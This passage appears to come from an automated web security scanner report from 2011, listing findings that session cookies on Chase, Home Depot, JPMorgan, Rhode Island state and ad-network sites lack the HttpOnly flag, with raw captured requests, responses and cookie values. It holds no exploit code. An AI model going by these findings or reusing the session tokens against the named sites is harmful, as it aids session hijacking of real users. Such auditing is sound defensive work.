Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css;charset=ISO-8859-1

#topGroup{PADDING-RIGHT:0;PADDING-LEFT:0;PADDING-BOTTOM:0;MARGIN:0;OVERFLOW:hidden;WIDTH:966px;PADDING-TOP:0;POSITION:relative;HEIGHT:40px;}#logo{LEFT:20px;WIDTH:107px;POSITION:absolute;TOP:7px;HEIGHT
...[SNIP]...

11.36. https://locator.chase.com/scripts/functions.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/scripts/functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=51C50F87456A49A993FD3E29683AC9E0.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/functions.js HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=51C50F87456A49A993FD3E29683AC9E0.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"17955-1310077260000"
Last-Modified: Thu, 07 Jul 2011 22:21:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 17955
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

var enclosingPageName="searchPage";var findClosestLocations="false";function changeDisplay(i,j,h){var l=null;$("#footerText").css("font-weight","normal");if(j){l=document.getElementById(j)}$("#newBuil
...[SNIP]...

11.37. https://locator.chase.com/scripts/idle-timer.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/scripts/idle-timer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0AFFFF922CBC642F5108B5336CEE610A.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/idle-timer.js HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=0AFFFF922CBC642F5108B5336CEE610A.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"701-1310078216000"
Last-Modified: Thu, 07 Jul 2011 22:36:56 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 701
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

(function(b){b.idleTimer=function a(i){var d=false,j=true,f=30000,g="mousemove keydown mousedown",h=function(){d=!d;a.olddate=+new Date;b(document).trigger(b.data(document,"idleTimer",d?"idle":"active
...[SNIP]...

11.38. https://locator.chase.com/scripts/jquery-1.2.6.pack.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/scripts/jquery-1.2.6.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=16AFC0030AD3146BC87A539BF5648CBD.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery-1.2.6.pack.js HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=16AFC0030AD3146BC87A539BF5648CBD.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"30779-1310076248000"
Last-Modified: Thu, 07 Jul 2011 22:04:08 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 30779
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

eval(function(h,b,i,d,g,f){g=function(a){return(a<b?"":g(parseInt(a/b)))+((a=a%b)>35?String.fromCharCode(a+29):a.toString(36))};if(!"".replace(/^/,String)){while(i--){f[g(i)]=d[i]||g(i)}d=[function(a)
...[SNIP]...

11.39. https://locator.chase.com/scripts/jquery.idletimeout.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/scripts/jquery.idletimeout.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5D256981E7BAD835AD80E2605896CD65.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.idletimeout.js HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=5D256981E7BAD835AD80E2605896CD65.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1720-1310076252000"
Last-Modified: Thu, 07 Jul 2011 22:04:12 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 1720
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

(function(a){a.idleTimeout=function(c,d,b){b=a.idleTimeout.options=a.extend({},a.idleTimeout.options,b);var e={init:function(){var f=this;this.warning=a(c);this.resume=a(document);this.countdownOpen=f
...[SNIP]...

11.40. https://locator.chase.com/scripts/ligeo.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/scripts/ligeo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5C29B2D52A9F1C0EE3B78DFDB832161D.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/ligeo.js?LOC=en_US HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C29B2D52A9F1C0EE3B78DFDB832161D.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"256540-1310077266000"
Last-Modified: Thu, 07 Jul 2011 22:21:06 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 256540
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

if(typeof dojo=="undefined"){var dj_global=this;var dj_currentContext=this;function dj_undef(b,a){return(typeof(a||dj_currentContext)[b]=="undefined")}if(dj_undef("djConfig",this)){var djConfig={}}if(
...[SNIP]...

11.41. https://locator.chase.com/urchin.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/urchin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E2DBBDFF293D6E983FAF3BEDF84D4182.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /urchin.js HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=E2DBBDFF293D6E983FAF3BEDF84D4182.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"22845-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 22845
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript;charset=ISO-8859-1

//-- Google Analytics Urchin Module
//-- Copyright 2007 Google, All Rights Reserved.

//-- Urchin On Demand Settings ONLY
var _uacct=""; // set up the Urchin Account
var _userv=0; // service
...[SNIP]...

11.42. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489624594; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
DotomiNet=2$DjQqblZ1RHBFAGZZAQZ%2BVAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGBffm5mXnRRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.43. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSASACCCQ=GOIIACKDPCKKPLGGFBAEABPM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=57386690&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:35:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Thu, 23 Jun 2011 11:35:46 GMT
Content-Length: 11995
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSASACCCQ=GOIIACKDPCKKPLGGFBAEABPM; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

11.44. https://www.chase.com/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.chase.com
Path:	/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DCTMSESSION=b3htTc2TXm501fjhWlLCyxYR5L9TfZdjhpBQbQLJvRlyl8ClTHFL!1272186516; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.45. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492757250%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cdUmHi5LdyePSUlqCjwXXsfwRdqQ%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489157221%3a%3bC25%5fEXP%3d1362329157%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529;Domain=.homedepot.com;Expires=Sun, 03-Mar-2013 16:45:57 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.46. http://www.jpmorgan.com/pages/jpmorgan previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JpmcSession=R1LrTc1Gcyk5wJvssGFbvLfYwwHQYdBm63BnpnCQbywrZyFdscZB!-8473515; path=/
ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
ARPT=NKOJWQS188.21-cws7214CKJKQ; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:26:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.21-cws7214CKJKQ; path=/
Set-Cookie: JpmcSession=R1LrTc1Gcyk5wJvssGFbvLfYwwHQYdBm63BnpnCQbywrZyFdscZB!-8473515; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 52008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<tit
...[SNIP]...

11.47. http://www2.tmc.state.ri.us/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www2.tmc.state.ri.us
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACSQSQSC=PBHFHDFCBEKCAMMOKHHEHGHD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www2.tmc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:32:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6932
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACSQSQSC=PBHFHDFCBEKCAMMOKHHEHGHD; path=/
Cache-control: private

<link rel="stylesheet" type="text/css" href="./splash/header/css/ddlevelsmenu.css" />
<link rel="stylesheet" type="text/css" href="./splash/header/css/ddlevelsmenu-base.css" />
<link rel="stylesheet
...[SNIP]...

11.48. http://511.dot.ri.gov/hb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://511.dot.ri.gov
Path:	/hb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RhodeIslandNGWeb=1679163402.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hb HTTP/1.1
Host: 511.dot.ri.gov
Proxy-Connection: keep-alive
Referer: http://www2.tmc.state.ri.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://511.dot.ri.gov/hb/
Date: Wed, 13 Jul 2011 00:33:05 GMT
Set-Cookie: RhodeIslandNGWeb=1679163402.20480.0000; path=/
Content-Length: 0

11.49. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
rth=2-ll8nk2-jd9~2zz6e~1~1-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.50. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!.=+rN@!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+